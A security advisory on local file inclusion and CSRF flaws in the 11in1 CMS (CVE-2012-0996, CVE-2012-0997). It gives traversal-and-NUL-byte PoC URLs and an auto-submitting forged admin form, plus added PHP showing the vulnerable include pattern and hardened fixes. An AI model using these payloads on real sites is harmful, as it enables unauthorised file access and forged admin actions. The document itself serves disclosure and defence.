High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in 11in1, which can be exploited to perform Local File Inclusion (LFI) and Cross-Site Request Forgery (CSRF) attacks.
Local File Inclusion in 11in1: CVE-2012-0996
Input passed via the “class” GET parameter to index.php and /admin/index.php is not properly verified before being used to include local files.
This can be exploited to include local files via directory traversal sequences and URL-encoded NULL bytes.
The following PoC (Proof of Concept) requests demonstrate the vulnerability:
http://[host]/index.php?class=../../../tmp/file%00
http://[host]/admin/index.php?class=../../../tmp/file%00
Successful exploitation of the vulnerabilities requires that “magic_quotes_gpc” is off: with it on, PHP escapes the URL-decoded NULL byte as “\0”, which no longer truncates the path and so the “.php” suffix appended by the application is not stripped.
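The following is an added example, not 11in1's own code: it sketches the vulnerable include pattern the advisory describes next to one hardened replacement. The “classes” directory, the function names and the “home” default are assumptions made for illustration.

```php
<?php
// Added example, not 11in1's own code. The "classes" directory, the function
// names and the "home" default are assumptions for illustration.

// Vulnerable pattern: the "class" parameter is concatenated straight into
// include(). With magic_quotes_gpc off, "../../../tmp/file%00" traverses out of
// the classes directory and the decoded NUL byte truncates the appended ".php"
// suffix (PHP before 5.3.4 truncated filesystem paths at a NUL byte).
function load_class_vulnerable(string $class): void
{
    include __DIR__ . '/classes/' . $class . '.php';
}

// Hardened replacement: allowlist the name, then confirm the resolved path
// still lives inside the classes directory.
function load_class_safe(string $class): void
{
    // Only simple identifiers: no slashes, dots or NUL bytes can pass.
    if (!preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $class)) {
        http_response_code(400);
        exit('invalid class');
    }
    $base = realpath(__DIR__ . '/classes');
    $path = realpath($base . '/' . $class . '.php');
    // realpath() returns false for a missing file; the prefix check also
    // defeats symlinks that would point outside the base directory.
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        http_response_code(404);
        exit('unknown class');
    }
    include $path;
}

load_class_safe($_GET['class'] ?? 'home');
```

The allowlist regex alone already rejects both PoC values (they contain “/”, “.” and a NUL byte); the realpath containment check is a second, independent control so that a later change to the regex cannot silently reopen the traversal.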
Cross-Site Request Forgery (CSRF) in 11in1: CVE-2012-0997
The application allows authorized users to perform certain actions via HTTP requests without making proper validity checks to verify the source of the requests.
To exploit this vulnerability, an attacker must induce a logged-in administrator to open a malicious link in the browser.
The following PoC will create a new topic on behalf of the website administrator:
<!-- The form posts to the admin action with the victim's session cookie; the script submits it without any user interaction -->
<form action="http://[host]/admin/index.php?class=do&action=addTopic" method="post">
<input type="hidden" name="name" value="New Topic Name here">
<input type="hidden" name="sec" value="3">
<input type="hidden" name="content" value="New Topic Content here">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>
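The following is an added example, not 11in1's own code: a per-session anti-CSRF token of the kind that would block the addTopic PoC above. The field name “csrf_token”, the function names and the surrounding form are assumptions made for illustration.

```php
<?php
// Added example, not 11in1's own code. The "csrf_token" field name, the
// function names and the form layout are assumptions for illustration.
// random_bytes() and hash_equals() need PHP 7.0 or later.
session_start();

// Issue one unpredictable token per session and embed it in every
// state-changing form. An attacker's page cannot read it: the same-origin
// policy keeps the admin's HTML away from other origins.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Reject any POST whose token is missing or wrong. hash_equals() compares in
// constant time so the check does not leak the token byte by byte.
function require_csrf_token(): void
{
    $sent = $_POST['csrf_token'] ?? '';
    if (!is_string($sent) || !hash_equals(csrf_token(), $sent)) {
        http_response_code(403);
        exit('invalid CSRF token');
    }
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_GET['action'] ?? '') === 'addTopic') {
    require_csrf_token();
    // ... create the topic from $_POST['name'], $_POST['sec'] and $_POST['content']
}
?>
<form action="/admin/index.php?class=do&amp;action=addTopic" method="post">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
  <input name="name">
  <input name="sec">
  <textarea name="content"></textarea>
  <input type="submit">
</form>
```

With this in place the forged form in the PoC still reaches the server with the administrator's session cookie, but it carries no valid “csrf_token” field and is rejected before any topic is created. Checking the token only on POST is enough here because the action itself must be POST-only; a handler that also accepts GET would have to apply the same check there.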